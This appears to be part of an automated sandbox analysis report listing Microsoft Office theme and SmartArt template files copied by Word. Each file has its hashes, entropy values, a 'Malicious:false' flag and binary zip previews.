                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1463634
                                                                                                                                              Entropy (8bit):7.898382456989258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2218943
                                                                                                                                              Entropy (8bit):7.942378408801199
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                              MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1750795
                                                                                                                                              Entropy (8bit):7.892395931401988
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                              MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2924237
                                                                                                                                              Entropy (8bit):7.970803022812704
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2357051
                                                                                                                                              Entropy (8bit):7.929430745829162
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3611324
                                                                                                                                              Entropy (8bit):7.965784120725206
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                              MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1091485
                                                                                                                                              Entropy (8bit):7.906659368807194
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                              MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):608122
                                                                                                                                              Entropy (8bit):7.729143855239127
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                              MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5783
                                                                                                                                              Entropy (8bit):7.88616857639663
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                              MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4026
                                                                                                                                              Entropy (8bit):7.809492693601857
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4243
                                                                                                                                              Entropy (8bit):7.824383764848892
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16806
                                                                                                                                              Entropy (8bit):7.9519793977093505
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                              MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11380
                                                                                                                                              Entropy (8bit):7.891971054886943
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                              Malicious:false
